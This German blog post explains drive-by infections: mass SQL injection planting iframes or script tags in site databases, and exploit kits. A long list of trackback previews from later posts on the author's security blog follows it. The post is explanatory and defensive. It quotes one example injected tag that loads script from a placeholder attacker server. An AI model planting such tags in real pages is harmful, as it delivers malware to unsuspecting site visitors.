Drive-by-Infektionen - Gefahren drohen überall

Geschrieben von Carsten Eilers am Donnerstag, 8. Juli 2010 um 09:14

Drive-by-Infektionen sind die zur Zeit wohl größte Bedrohung im Web: In eigentlich vertrauenswürdige Websites eingeschleuste iframes oder script-Tags versuchen, auf den Rechnern der Besucher Schadsoftware einzuschleusen. Und auch außerhalb des Webs lauert diese Gefahr: Cyberkriminelle können ihre Opfer über E-Mails auf präparierte Seiten locken, wie es z.B. im Rahmen der "Operation Aurora" genannten gezielten Angriffe auf Google und andere Unternehmen eindrucksvoll vorgeführt wurde. Und Sophos berichtet über Spam-Mails, deren HTML-Anhänge außer dem Spam zusätzlich einen unsichtbaren iframe zum Einschleusen von Schadcode enthalten.

Der klassische Fall: Kompromittierte Websites

Im klassischen Fall der kompromittierten Websites erfolgt der Angriff in zwei Schritten: Zuerst wird eine normalerweise vertrauenswürdige Webseite so manipuliert, das sie bösartigen JavaScript-Code enthält. Danach wird von diesem JavaScript-Code in einem oder mehreren Schritten der eigentliche Schadcode auf dem Rechner des ahnungslosen Besuchers eingeschleust. Für diese Angriffe hat sich der Begriff Drive-by-Download oder Drive-by-Infektion eingebürgert, wobei ich den zweiten für passender halte - Drive-by-Download klingt zu harmlos.

Die Installation des Schadcodes erfolgt ohne Zutun des Benutzers, der i.A. nicht einmal bemerkt, was da gerade passiert. In einem script-Tag oder über einen iframe wird ein JavaScript-Skript eingebunden, das dann versucht, über eine mehr oder weniger großer Anzahl an Exploits zur Ausnutzung aktueller und auch älterer Schwachstellen den Schadcode einzuschleusen. Ist dieser erste Schadcode, der sog. Downloader, auf dem Rechner installiert, lädt er weiteren Code nach, der verschiedenen Zwecken dienen kann. Vom Ausspähen von Zugangsdaten bis zur Integration des Rechners in ein Botnet ist dann alles möglich. Manche Schädlinge laden bei Bedarf auch weiteren Code nach, so dass ein ausspionierter Rechner anschließend noch als Teil eines Botnets dienen kann.

Das erste Opfer: Der Webserver

Im Juni 2010 liefen laut Sucuri Security mindestens zwei groß angelegte SQL-Injection-Angriffe auf ASP.NET-Websites, die Code für Drive-by-Infektionen einschleusten. Das ist eigentlich nichts Neues, das gab es genau so auch schon 2008. Die SQL-Injection-Angriffe nutzen keine Schwachstellen in bestimmten Anwendungen oder Erweiterungen aus, sondern sind allgemein gegen alle ASP-Anwendungen gerichtet. Gibt es darin eine SQL-Injection-Schwachstelle, fällt sie dem Angriff zum Opfer. Sophos hat am 4. Juli über eine mögliche weitere Welle von SQL-Injection-Angriffen berichtet.

Der Klassiker: SQL-Injection

Die SQL-Injection-Angriffe folgen meist einem einheitlichen Muster: Alle geeigneten Datenbankfelder werden mit iframes oder script-Tags zum Nachladen von Schadcode gefüllt, in der Hoffnung, dass mindestens eines der Felder ohne weitere Prüfung oder Bearbeitung ausgegeben wird. Dabei werden Systemtabellen und z.B. rein numerische Felder ignoriert und nur die einem normalen Benutzer gehörenden Tabellen und darin die Felder mit Textwerten etc. manipuliert. Werden die Werte daraus dann später unverändert an die Besucher der Website ausgegeben, wird der eingeschleuste Code im Webbrowser der Benutzer ausgeführt und JavaScript-Schadcode zum Ausnutzen verschiedener Schwachstellen nachgeladen.

Wie viele Websites ungefähr Opfer einer Angriffswelle geworden sind, verraten die Suchmaschinen: Da der iframe oder script-Tag in alle passenden Felder eingeschleust wird, sind regelmäßig auch welche dabei, die an Stellen ausgegeben werden, an denen diese Tags laut HTML-Standard nicht vorgesehen sind und daher auch nicht ausgewertet werden, z.B. innerhalb des title-Tags. Sucht man nach dem eingeschleusten Code, z.B.

<script src=http://www.boeser-server.example/pfad/zum/skript.js></script>

werden die Seiten mit dem entsprechenden iframe oder script-Tag ausgegeben.

Es gibt mehrere Tools, sog. Exploit-Kits, die von den Cyberkriminellen zur Vorbereitung und Durchführung derartiger Angriffe genutzt werden können. Dabei können sowohl die anzuwendenden Exploits als auch die anzugreifenden Websites komfortabel ausgewählt und die Angriffe konfiguriert werden. Danach muss der Kriminelle nur noch darauf warten, dass die verteilte Schadsoftware sich mit seinem Server verbindet. Die Manipulation der harmlosen Websites und die Angriffe auf deren Besucher laufen automatisch ab.

In der nächsten Folge werde ich einen SQL-Injection-Angriff zum Einschleusen eines iframes oder script-Tags genauer beschreiben.

Carsten Eilers

Übersicht über alle Artikel zum Thema

Drive-by-Infektionen - Gefahren drohen überall
Drive-by-Infektionen durch SQL-Injection vorbereitet
Drive-by-Infektionen: So kommt der Schadcode auf den Server
Drive-by-Infektionen - Vom Server auf den Client
Drive-by-Infektionen - Ein Blick auf die Exploits
Drive-by-Infektionen erkennen und abwehren
LizaMoon - Massenhack mit minimalen Folgen
Aktuelles: LizaMoon auf Apples iTunes-Seiten
Drive-by-Infektionen über präparierte Werbung

Trackbacks

Trackback-URL für diesen Eintrag

Dipl.-Inform. Carsten Eilers am Donnerstag, 22. Juli 2010: Phishing mit Tabs: Tabnabbing

Vorschau anzeigen

Einen neuen Phishing-Ansatz hat Aza Raskin, der 'Creative Lead' für Firefox, beschrieben: Indem der Titel, der Inhalt und das Favicon eines gerade nicht im Fokus liegenden Browser-Tabs geändert werden, kann dem Benutzer darin eine vertra

Dipl.-Inform. Carsten Eilers am Donnerstag, 4. November 2010: Angst einflößende Schadsoftware: Scareware

Vorschau anzeigen

Schadsoftware, englisch "Malware", gibt es für viele verschiedene Zwecke. In diesen und den folgenden Texten geht es auf eine kleine Rundreise durch die Welt der Schadsoftware. Den Anfang macht die sog. "Scareware": Schadsoftware, die zwar vie

Dipl.-Inform. Carsten Eilers am Montag, 8. November 2010: 10 Tage, 4 0-Day-Schwachstellen - Cyberkriminelle in Jahresendpanik?

Vorschau anzeigen

Zwischen dem 26. Oktober und 4. November wurden 4 0-Day-Exploits entdeckt. Eine der Schwachstellen wurde bereits vollständig und eine in der bisher nicht angegriffenen Komponente behoben. Wenn das so weiter geht, wird es ein ziemlicher hei&s

Dipl.-Inform. Carsten Eilers am Montag, 3. Januar 2011: 2010 - Ein Rückblick auf ein ereignisreiches Jahr

Vorschau anzeigen

2010 war ein gerade aus Sicht der IT-Sicherheit ereignisreiches Jahr. 2011 kann es gerne ruhiger zugehen, aber vermutlich gilt wie immer die Regel von Bernd dem Brot: "Alles ist wie immer, nur schlimmer! Einige Beispiele: So hat z.B. das Bund

Dipl.-Inform. Carsten Eilers am Montag, 11. April 2011: Gezielter Angriff auf RSA mit unabsehbaren Folgen

Vorschau anzeigen

Mitte März meldete RSA einen gezielten Angriff, bei dem nicht näher beschriebene Daten ausgespäht wurden. Darunter befanden sich auch Informationen über die SecurID-Token zur Zwei-Faktor-Authentifizierung. Ebenfalls Mitte M&aum

Dipl.-Inform. Carsten Eilers am Montag, 20. Juni 2011: Die Rückkehr des Exploit-Thursday

Vorschau anzeigen

Microsoft veröffentlicht am Dienstag seine Patches, und die Cyberkriminellen am Mittwoch oder Donnerstag die Exploits für die soeben behobenen Schwachstellen - vor einigen Jahren war das fast üblich. Jetzt ist es wohl wieder soweit

Dipl.-Inform. Carsten Eilers am Montag, 11. Juli 2011: Warum Sie ihre Website auf Schwachstellen testen sollten

Vorschau anzeigen

Ist Ihre Website sicher? Sind Sie sich da wirklich ganz sicher? Wenn nicht, ist jetzt eine gute Gelegenheit, Server und Anwendungen auf Schwachstellen zu testen. Bevor es andere tun und Sie womöglich erst aus der Presse erfahren, dass Ihre ei

Dipl.-Inform. Carsten Eilers am Montag, 18. Juli 2011: iPhone Jailbreak - Gut gemeint ist nicht immer gut gemacht

Vorschau anzeigen

Für gut eine Woche waren alle iPhone-Besitzer der akuten Gefahr einer Drive-by-Infektion durch Ausnutzung mehrerer 0-Day-Schwachstellen ausgesetzt - und dass nur, damit einige iPhone-Besitzer (und die von anderen iOS-Geräten) ihr Ger&aum

Dipl.-Inform. Carsten Eilers am Donnerstag, 18. August 2011: Likejacking - Facebook im Visier der Cyberkriminellen

Vorschau anzeigen

Vor etwas mehr als einem Jahr wurde festgestellt, dass Facebooks Like-Button zum Clickjacking geradezu auffordert. Diese speziellen Angriffe wurden "Likejacking" getauft, und in der Zwischenzeit gab es eine Vielzahl davon. Likejacking - Cybe

Dipl.-Inform. Carsten Eilers am Montag, 22. August 2011: Onlinebanking: Cyberkriminelle reagieren auf Chip- und SMS-TAN

Vorschau anzeigen

Cyberkriminelle und Banken liefern sich zur Zeit wohl ein Rennen wie Hase und Igel. Die Frage ist nur, wer Hase und wer Igel ist und ob der Hase am Ende wirklich tot umfällt. TAN-Listen tot, SMS-TAN angeschlagen Die herkömmliche

Dipl.-Inform. Carsten Eilers am Montag, 19. September 2011: Die smsTAN ist tot, der SMS-Dieb schon da!

Vorschau anzeigen

Die Banken schaffen die iTAN ab, weil es (zu viele) Kunden gibt, die das Opfer von Man-in-the-Browser-Angriffen werden oder auf Phisher hereinfallen. Möchte jemand wetten, dass genau diese Kunden sich nicht stattdessen genauso einfach einen Sma

Dipl.-Inform. Carsten Eilers am Montag, 17. Oktober 2011: Digitale Schutzimpfung

Vorschau anzeigen

Heise Security hat festgestellt, dass einige Virenscanner bei der Erkennung eines minimal manipulierten Staatstrojaners versagen und die Erkennungsleistung auch sonst zu wünschen übrig lässt. Wundert das irgend jemanden? Virensc

Dipl.-Inform. Carsten Eilers am Montag, 24. Oktober 2011: Clickjacking gegen Flash, urchin.js und Duqu - nichts als Wiederholungen!

Vorschau anzeigen

Wiederholungen, nichts als Wiederholungen. Nein, ich meine nicht das TV-Programm im Sommer(loch). Auch die Cyberkriminellen haben in letzter Zeit auf Bewährtes gesetzt: Clickjacking gegen Flash, Massen-SQL-Injection und Code-Recycling sind ang

Dipl.-Inform. Carsten Eilers am Montag, 7. November 2011: Wie gefährlich ist die Duqu-0-Day-Schwachstelle?

Vorschau anzeigen

Microsoft hat ein Security Advisory zur von Duqu ausgenutzten 0-Day-Schwachstelle im Kernel veröffentlicht. Gefährliche oder weniger gefährliche Schwachstelle? Die Schwachstelle mit der CVE-ID CVE-2011-3402 befindet sich i

Dipl.-Inform. Carsten Eilers am Montag, 9. Januar 2012: Lilupophilupop - Eine SQL-Injection-Welle ist unterwegs

Vorschau anzeigen

SQL-Injection-Angriffe auf ASP-Websites gibt es eigentlich ständig, meist ohne dass sie besondere Aufmerksamkeit erregen. Von Zeit zu Zeit gibt es auch größere Wellen, wie z.B. LizaMoon im Frühjahr 2011. Auch im Herbst 2011

Dipl.-Inform. Carsten Eilers am Donnerstag, 12. Januar 2012: "DNS-Changer" - welcher DNS-Changer ist gemeint?

Vorschau anzeigen

Das Bundesamt für Sicherheit in der Informationstechnik (BSI) empfiehlt allen Internetnutzern, ihre Rechner auf eine Infektion mit der Schadsoftware "DNS-Changer" zu überprüfen und nennt auch eine Website, auf der das online erledigt

Dipl.-Inform. Carsten Eilers am Donnerstag, 2. Februar 2012: Exploit-Kit über Wordpress Version 3.2.1 verbreitet

Vorschau anzeigen

Zwei Berichten zu Folge wird (relativ) massiv über kompromittierte Wordpress-3.2.1-Installationen ein Exploit-Kit verbreitet. Darüber, wie die Wordpress-Installationen kompromittiert werden, herrscht Unklarheit. Zumindest gibt es zwei E

www.supernature-forum.de am Dienstag, 14. Februar 2012: PingBack

Die Anzeige des Inhaltes dieses Trackbacks ist leider nicht möglich.

Dipl.-Inform. Carsten Eilers am Donnerstag, 8. März 2012: CeBIT 2012 - Alles wird gut!

Vorschau anzeigen

Das Motto der CeBIT 2012: Managing Trust. Na, dann wird ja alles ganz sicher. Vor allem in der Cloud - man muss nur Vertrauen haben! Was stören einen dann schon mögliche Angriffe oder Schwachstellen? Oder der mögliche Zugriff durch

Dipl.-Inform. Carsten Eilers am Montag, 26. März 2012: Macs im Visier

Vorschau anzeigen

Mac OS X wird immer beliebter. Auch bei den Cyberkriminellen. Und dann gibt es da wohl auch noch mindestens einen Staat, der es auf Mac-Benutzer abgesehen hat. Aber fangen wir mit den normalen Cyberkriminellen an. Flashback - Erstinfektion ohn

Dipl.-Inform. Carsten Eilers am Donnerstag, 29. März 2012: Zeus, Carberp und Khelios - Drei Schläge gegen Botnets

Vorschau anzeigen

Es ist mal wieder Zeit, einen Blick auf die verschiedenen Botnets zu werfen. Denen geht es zur Zeit an den Kragen. Zumindest einigen, und zumindest teilweise. Microsoft gegen Zeus-Botnets Microsofts "Digital Crimes Unit" hat gemeinsam mit

Dipl.-Inform. Carsten Eilers am Dienstag, 10. April 2012: Das Flashback-Botnet und Apples Langsamkeit

Vorschau anzeigen

Der Mac wird bei den Cyberkriminellen immer beliebter, und inzwischen haben sie ca. 1% aller Macs in einem Botnet versammelt. Wirklich? Und was macht Apple dagegen? Das Flashback-Botnet - 550.000, 600.000, wer bietet mehr? Es gibt ein r

Dipl.-Inform. Carsten Eilers am Montag, 16. April 2012: "Für den Mac gibt es keine Viren"? - Weg mit den Mythen!

Vorschau anzeigen

Es ist an der Zeit, mal mit einige Mythen rund um den Mac, Schadsoftware und das Flashback-Botnet aufzuräumen. Wenn man sich die verschiedenen Mac-Foren ansieht, liest man immer wieder die gleichen, falschen Aussagen. Da ich weder Lust noch Zei

Dipl.-Inform. Carsten Eilers am Donnerstag, 19. April 2012: Ein bekannter Advanced Persistent Threat: Operation Aurora

Vorschau anzeigen

Nachdem geklärt ist, was ein APT ist, wollen wir jetzt einen Blick auf den Ablauf so eines Angriffs richten. Als erstes Beispiel dient der Angriff, der den Begriff "Advanced Persistent Threat" im Januar 2010 bekannt gemacht hat: Operation

Dipl.-Inform. Carsten Eilers am Montag, 23. April 2012: Neues zu Flashback & Co. und WordPress

Vorschau anzeigen

Es gibt noch ein paar Neuigkeiten zu Flashback und anderen, die gleiche Schwachstelle ausnutzenden Schädlingen. Und wussten Sie schon, dass Flashback über WordPress-Installationen verbreitet wurde und noch wird? Abweichungen bei der

Dipl.-Inform. Carsten Eilers am Montag, 30. April 2012: Macs und Schadsoftware, in allen möglichen Varianten

Vorschau anzeigen

Heute gibt es mal wieder ein Sammelsurium an Kommentaren zu verschiedenen Themen, die aber alle eins miteinander verbindet: Sie haben etwas mit Schadsoftware auf dem Mac zu tun, zumindest indirekt. Windows-Schädlinge auf Macs Sophos b

Dipl.-Inform. Carsten Eilers am Montag, 7. Mai 2012: Reaktionen

Vorschau anzeigen

Heute geht es um verschiedene Reaktionen, die aber alle in der einen oder anderen Form etwas mit IT-Sicherheit zu tun haben. Hase und Igel bei Drive-by-Infektion Am 23. April wurde ich auf eine neue Drive-by-Infektion aufmerksam gemacht un

Dipl.-Inform. Carsten Eilers am Donnerstag, 10. Mai 2012: Kann man Advanced Persistent Threats erkennen?

Vorschau anzeigen

Die "Operation Aurora", Stuxnet und der Angriff auf RSA - drei bekannte Advanced Persistent Threats und zwei entscheidende Fragen: Kann man solche Angriffe erkennen, und wenn ja: Wie? Der eigentliche Angriff Fangen wir mit dem eigentlic

Dipl.-Inform. Carsten Eilers am Montag, 14. Mai 2012: Kommentare zu SQL-Injection-Massenhacks, Drive-by-Infektionen und Exploit-Kits

Vorschau anzeigen

Man nehme einige SQL-Injection-Massenhacks, eine Prise Drive-by-Infektionen und zwei Exploit-Kits, würze mit einigen Kommentaren, rühre gut um - und schon ist dieser Standpunkt fertig. Lizamoon weiterhin aktiv Vor etwas mehr als

Dipl.-Inform. Carsten Eilers am Donnerstag, 21. Juni 2012: Ungewöhnlich: Drive-by-Infektionen über 0-Day-Exploits

Vorschau anzeigen

Zur Zeit laufen Angriffe über zwei Schwachstellen in Microsoft-Programmen, die beide die Ausführung von eingeschleustem Code erlauben: Eine 0-Day-Schwachstelle in den XML Core Services und eine am Juni-Patchday gepatchte Schwachstelle im In

Dipl.-Inform. Carsten Eilers am Donnerstag, 5. Juli 2012: Advanced Persistent Threats gegen tibetische Aktivisten und mehr

Vorschau anzeigen

Zum Abschluss des Themas Advanced Persistent Threats gibt es in dieser Folge noch ein paar Informationen, die in die anderen Texte nicht passten oder nach deren Veröffentlichung erschienen sind. Als Beispiel dafür, dass nicht nur Unterneh

Dipl.-Inform. Carsten Eilers am Donnerstag, 26. Juli 2012: Google Hacking - The Next Generation

Vorschau anzeigen

Was Google Hacking ist, haben Sie in der vorherigen Folge erfahren, in der auch erste Beispiele und die wichtigsten Google-Optionen vorgestellt wurden. Schon damit kann man viele interessante Informationen sammeln, aber mit entsprechenden Anpassu

Dipl.-Inform. Carsten Eilers am Donnerstag, 2. August 2012: SQL-Injection im Schnelldurchlauf

Vorschau anzeigen

Laut dem Cloud-Hosting-Anbieter FireHost ist die Zahl der erkannten SQL-Injection-Angriffe zwischen April und Juni 2012 um 69% gestiegen. Während im 1. Quartal 2012 "nur" 277.770 Angriffe abgewehrt wurden, waren es im 2. Quartal 469.983 Angr

Dipl.-Inform. Carsten Eilers am Montag, 27. August 2012: Kommentare zu diesem und jenem...

Vorschau anzeigen

Auch heute gibt es "nur" Kurzkommentare zu jeder Menge Links. Los geht es mit bösartiger Google-Werbung. Oder wie sonst soll man Anzeigen bezeichnen, die wie ein Download-Button aussehen und auf Download-Seiten eingeblendet werden? Google, yo

Dipl.-Inform. Carsten Eilers am Donnerstag, 30. August 2012: Angriffe über zwei 0-Day-Schwachstellen in Java

Vorschau anzeigen

Zur Zeit gibt es zwei 0-Day-Schwachstellen in Java, ein Exploit befindet sich bereits im Exploit-Kit "Black Hole", und Angriffe darüber wurden auch schon gemeldet. Falls Sie das Java-Plug-In ihres Browsers noch nicht deaktiviert haben, wird

Dipl.-Inform. Carsten Eilers am Donnerstag, 20. September 2012: Die aktuelle 0-Day-Schwachstelle im Internet Explorer

Vorschau anzeigen

Seit einigen Tagen wird eine 0-Day-Schwachstelle im Internet Explorer im Rahmen von Drive-by-Infektionen ausgenutzt. Microsoft hat soeben die sofortige Veröffentlichung eines FixIt-Tools sowie die Veröffentlichung eines Updates

Dipl.-Inform. Carsten Eilers am Montag, 26. November 2012: Kommentare zu Flame, einem neuen Wurm, einem auf Java spezialisierten Exploit-Kit und mehr

Vorschau anzeigen

Es gibt Neues zu Flame, ein neuer Wurm macht den Nahen Osten unsicher, ein Exploit-Kit scheint sich auf Java zu spezialisieren, und ein Rootkit verbreitet Drive-by-Infektionen. Das ist doch ein paar Kommentare wert. Neues zu Flame Sie erinn

Dipl.-Inform. Carsten Eilers am Montag, 10. Dezember 2012: Eurograbber beweist: mTANs gefährden Ihr Bankkonto!

Vorschau anzeigen

Eran Kalige von Versafe und Darrell Burkey von Check Point Software Technologies haben eine Fallstudie zu einem groß angelegten Angriff auf Onlinebanking-Nutzer veröffentlicht: "A Case Study of Eurograbber: How 36 Million Euros was Stolen

Dipl.-Inform. Carsten Eilers am Donnerstag, 20. Dezember 2012: HTML5 Security - postMessage() sicher nutzen

Vorschau anzeigen

Wie bereits erwähnt lehnt sich diese kleine Serie zur Sicherheit von HTML5 an meinen Vortrag auf der WebTech Conference 2012 an. Womit auch schon das aktuelle Thema vorgegeben ist: Die mit HTML5 eingeführte Methode postMessage().

Dipl.-Inform. Carsten Eilers am Montag, 7. Januar 2013: 0-Day-Schwachstelle im Internet Explorer, Ausgabe Dezember 2012

Vorschau anzeigen

Ende Dezember wurden Angriffe über eine neue 0-Day-Schwachstelle im Internet Explorer entdeckt. Und die hat es ebenso wie die Angriffe selbst in sich. Erste Angriffe am 27. 21. 7 Dezember 2012 Laut Symantec und FireEye konnten die er

Dipl.-Inform. Carsten Eilers am Donnerstag, 10. Januar 2013: Drucksache: Windows.Developer 2.2013 - SQL Injection

Vorschau anzeigen

In der neuen Kategorie "Drucksache" werde ich in Zukunft auf Texte von mir hinweisen, die in Magazinen etc. erschienen sind. Los geht es mit der Windows.Developer Ausgabe 2.2013. Darin ist ein Artikel über SQL Injection (nicht nur) in

Dipl.-Inform. Carsten Eilers am Donnerstag, 10. Januar 2013: Drucksache: PHP Magazin 2.2013 - Drive-by-Infektionen

Vorschau anzeigen

Mein Artikel im PHP Magazin 2.2013 beschäftigt sich mit den auch hier im Blog schon behandelten Drive-by-Infektionen. Da der Artikel im PHP Magazin erschienen ist, liegt der Schwerpunkt natürlich auf PHP. Konkret erkläre ich am B

Dipl.-Inform. Carsten Eilers am Montag, 14. Januar 2013: Java 0-Day-Schwachstelle nach 3 Tagen behoben

Vorschau anzeigen

Es gibt mal wieder eine 0-Day-Schwachstelle in Java. Oder besser: Es gab sie. Denn sie wurde von Oracle bereits geschlossen - nach nur 3 Tagen! Kommen wir also zu einem Drama in 4 AktenTagen: 10. Januar: Exploit "in the wild" und vielen Ex

Dipl.-Inform. Carsten Eilers am Montag, 11. März 2013: Pwn2Own: Safari ignoriert, alles andere gehackt

Vorschau anzeigen

Beim diesjährigen Pwn2Own-Wettbewerb auf der Sicherheitskonferenz CanSecWest wurde mit Ausnahme von Apples Safari alles gehackt, was zur Verfügung stand. Und ob Safari nun allen Angriffen widerstanden hat oder ob niemand Lust hatte, s

Dipl.-Inform. Carsten Eilers am Montag, 18. März 2013: Schwachstelle in Mac OS X erlaubte Java-Angriffe ohne Java-Plug-In

Vorschau anzeigen

Java im Browser ist gefährlich. Darum sollte man es ausschalten, wenn man es nicht braucht. Denn was nicht aus dem Browser heraus erreichbar ist, kann auch nicht über eine Drive-by-Infektion angegriffen werden. Im Fall von Mac OS X

Dipl.-Inform. Carsten Eilers am Montag, 18. März 2013: Drucksache: Windows.Developer 4.2013 - Wie sicher ist das Tablet?

Vorschau anzeigen

Im Windows.Developer 4.2013 ist ein Artikel über die Sicherheit von Tablets erschienen. Vorgestellt werden die bisher bekannten theoretischen und praktischen Angriffe. Bisher gibt es von beiden zwar erst wenige, aber da die Tablets immer mehr

Dipl.-Inform. Carsten Eilers am Montag, 8. April 2013: Kommentare zu PostgreSQL, Ad-Blockern, AT&T Passwortregeln und mehr

Vorschau anzeigen

Die Themen heute: PostgreSQL ergreift vor der Veröffentlichung eines Sicherheitsupdates eine zweifelhafte Schutzmaßnahme, Ad-Blocker können vor Drive-by-Infektionen schützen, und AT&T verwendet unsichere Passwortregeln. Au&s

Dipl.-Inform. Carsten Eilers am Donnerstag, 18. April 2013: Code Signing - Auch Schadsoftware kann signiert sein

Vorschau anzeigen

Oracles Antwort auf Javas ständige Sicherheitsprobleme: Der Einsatz von Code Signing. Vorerst gibt es nur mehr oder weniger ausführliche Warnungen vor nicht oder falsch signierten Applets, irgendwann sollen dann nur noch signierte Apple

Dipl.-Inform. Carsten Eilers am Dienstag, 21. Mai 2013: Kommentare rund um Schadsoftware, SSL und Googles Glass

Vorschau anzeigen

Heute gibt es mal wieder nur ein paar kommentierte Lesetipps: Zu Schadsofware, zu SSL und zu Googles Glass, Datenschutz und Privatsphäre Googles Glass wirft viele Fragen auf, zum Beispiel wie es mit dem Datenschutz der damit Beobach

Dipl.-Inform. Carsten Eilers am Montag, 3. Juni 2013: Was haben Flame, gepackte Windows-Systemdateien und die "Operation Aurora" gemeinsam?

Vorschau anzeigen

Bei allen dreien handelt es sich um Schädlinge - echte und angebliche. Vor einem Jahr wurde Flame entdeckt - mit anfangs viel Rauch um fast nichts. Rauch erzeugen, das können Antivirenhersteller gut - zum Beispiel, wenn ihre Scanner gepack

Dipl.-Inform. Carsten Eilers am Donnerstag, 11. Juli 2013: Microsoft aktualisiert Security Bulletin: Erneut 0-Day-Schwachstelle im IE

Vorschau anzeigen

Microsoft hat das am 9. Juli veröffentlichte Security Bulletin MS13-055 für den Internet Explorer aktualisiert: Die Schwachstelle CVE-2013-3163 wird im Rahmen gezielter Angriffe ausgenutzt, betroffen ist konkret der IE 8. Wir haben es a

Dipl.-Inform. Carsten Eilers am Donnerstag, 1. August 2013: Schutzmaßnahmen: Content Security Policy gegen XSS, Teil 3

Vorschau anzeigen

Nach der allgemeinen Einführung in die Content Security Policy und dem Überblick über die Anweisungen geht es in dieser Folge zuerst um die Schlüsselwörter, die von der CSP erkannt werden. Die Quelle (des Gutem, in

Dipl.-Inform. Carsten Eilers am Montag, 19. August 2013: Ein paar kommentierte Links zum Wochenanfang

Vorschau anzeigen

Heute gibt mal wieder "nur" ein paar mehr oder weniger kommentierte Links statt eines "Standpunkts" zu einem Thema. Los geht es mit einem Text von Paul Ducklin von Sophos: "Anatomy of a brute force attack - how important is password complexity?".

Dipl.-Inform. Carsten Eilers am Donnerstag, 19. September 2013: 0-Day-Schwachstelle im Internet Explorer, die dritte

Vorschau anzeigen

Es gibt schon wieder eine 0-Day-Schwachstelle im Internet Explorer. Insgesamt die 15. in diesem Jahr, und die dritte im Internet Explorer (und dann gab es da ja auch noch die Ende Dezember 2012 im IE gemeldete, die es fast in dieses Jahr geschaff

Dipl.-Inform. Carsten Eilers am Montag, 14. Oktober 2013: IE: Ein 0-Day-Exploit für zwei Angriffe?

Vorschau anzeigen

Es gibt neue Informationen zur aktuellen 0-Day-Schwachstelle im Internet Explorer. Nein, nicht zu der, für die Microsoft Mitte September eine FixIt-Tool veröffentlicht hat (CVE-2013-3893), sondern für die, die am Oktober-Patchday

Dipl.-Inform. Carsten Eilers am Montag, 28. Oktober 2013: php.net war für Drive-by-Infektionen präpariert

Vorschau anzeigen

Am Donnerstag stufte Google php.net als bösartige Website ein. Was zuerst wie ein Fehlalarm, also ein False Positive, aussah, entpuppte sich später als tatsächliche Kompromittierung, es wurde Code für Drive-by-Infektionen

Dipl.-Inform. Carsten Eilers am Mittwoch, 6. November 2013: 0-Day-Schwachstelle in Microsoft Graphics betrifft Office und Windows

Vorschau anzeigen

Es gibt mal wieder eine 0-Day-Schwachstelle. Sie befindet sich in Microsoft Graphics und betrifft Windows (Vista und Server 2008, Microsoft Office und Lync. Es handelt sich um die 17. 0-Day-Schwachstelle in diesem Jahr. Wie (mit einer Ausnahme)

Dipl.-Inform. Carsten Eilers am Sonntag, 10. November 2013: 0-Day-Exploit für Internet Explorer entdeckt

Vorschau anzeigen

FireEye hat einen 0-Day-Exploit für den Internet Explorer entdeckt. Der im Rahmen einer Drive-by-Infektion eingesetzte Exploit kombiniert ein Informationsleck und einen "out-of-bounds memory access" zur Ausführung eingeschleusten Schadco

Dipl.-Inform. Carsten Eilers am Montag, 18. November 2013: Kommentare zu neuen Angriffen über die 0-Day-Schwachstelle in MS Graphics und mehr

Vorschau anzeigen

Eine weitere Angreifer-Gruppe nutzt die 0-Day-Schwachstelle in MS Graphics, es gibt einen neuen 0-Day-Exploit für die japanische Textverarbeitung Ichitaro, und ein chinesischer Schädling ändert über AutoCAD die Startseite des Webb

Dipl.-Inform. Carsten Eilers am Montag, 2. Dezember 2013: Die 0-Day-Schwachstelle in Windows XP oder Microsofts Workaround - was ist gefährlicher?

Vorschau anzeigen

Es gibt mal wieder eine 0-Day-Schwachstelle, diesmal in Windows XP und Server 2003. Im Vergleich zu den 0-Day-Exploits die bisher aufgetaucht sind, ist die aber relativ Harmlos: Sie erlaubt "nur" das Erlangen von Admin-Rechten und wird in Verbindu

Dipl.-Inform. Carsten Eilers am Mittwoch, 11. Dezember 2013: Der 0-Day-Patchday am 10.12.2013: 4x Microsoft, 1x Adobe

Vorschau anzeigen

Wie angekündigt hat Microsoft am Dezember-Patchday am 10.12. einen Patch für die 0-Day-Schwachstelle in MS Graphics veröffentlicht. Außerdem wurden von Microsoft drei weitere 0-Day-Schwachstellen behoben, die bisher nicht &ou

Dipl.-Inform. Carsten Eilers am Montag, 16. Dezember 2013: 2013 - Das Jahr der 0-Day-Exploits

Vorschau anzeigen

Das Jahr ist bald vorbei, in einer Woche ist Weihnachten, in zwei Wochen ist Sylvester. Wenn nichts dazwischen kommt (also diese Woche nicht zum Beispiel ein weiterer 0-Day-Exploit auftaucht) wird dies der letzte "Standpunkt" für 2013 sein. Da

Dipl.-Inform. Carsten Eilers am Mittwoch, 15. Januar 2014: Drucksache: PHP Magazin 2.2014 - Angriffsziel Webbrowser

Vorschau anzeigen

Im PHP Magazin 2.2014 ist ein Artikel über den aktuellen Stand der Sicherheit von HTML5 und JavaScript erschienen. Im PHP Magazin 3 und 4/2012 wurden zuletzt Artikel über die Sicherheit von HTML5 veröffentlicht. Da drängt s

Dipl.-Inform. Carsten Eilers am Mittwoch, 15. Januar 2014: Es ist da: Mein Buch "iOS Security - Sichere Apps für iPhone und iPad"

Vorschau anzeigen

Ich habe gestern die Belegexemplare meines neuen Buchs "iOS Security - Sichere Apps für iPhone und iPad" bekommen, ab sofort ist es auch im Buchhandel erhältlich (sowohl gedruckt als auch als eBook). Den Inhalt kenne ich ja schon etwas l&

Dipl.-Inform. Carsten Eilers am Freitag, 7. Februar 2014: Drucksache: windows.developer Magazin 3.2014 - JavaScript in Angreiferhand

Vorschau anzeigen

Im windows.developer 3.2014 ist ein Artikel über Angriffe über JavaScript erschienen. JavaScript-Code kann so wie jedes andere Computerprogramm auch Schwachstellen enthalten, und so wie in jeder anderer Programmiersprache kön

Dipl.-Inform. Carsten Eilers am Montag, 10. Februar 2014: Kommentare zu trickreichen Drive-by-Infektionen und mehr

Vorschau anzeigen

Heute gibt es Kommentare zur 0-Day-Schwachstelle im Flash Player, einer neuen Taktik für Drive-by-Infektionen und Werbung für bösartige Installationsprogramme. Und gleich zu Anfang einen Hinweis zu Schadsoftware anlässlich der O

Dipl.-Inform. Carsten Eilers am Donnerstag, 20. Februar 2014: Linksys, AVM, Asus - Router in Gefahr

Vorschau anzeigen

Das Internet Storm Center warnt vor einem aktuell laufenden Massen-Angriff auf Linksys E1000 und E1200 Router. Das Bundesamt für Sicherheit in der Informationstechnik (BSI) empfiehlt dringend die Installation der von AVM veröffentlich

Dipl.-Inform. Carsten Eilers am Montag, 28. April 2014: Dritter 0-Day-Exploit für den Internet Explorer in 2014 entdeckt

Vorschau anzeigen

Microsoft warnt vor einem 0-Day-Exploit für den Internet Explorer. Es ist der dritte für den IE und der sechste insgesamt im Jahr 2014. Das besondere an diesem Exploit: Er betrifft alle IE-Versionen von 6 bis 11 und damit auch das nic

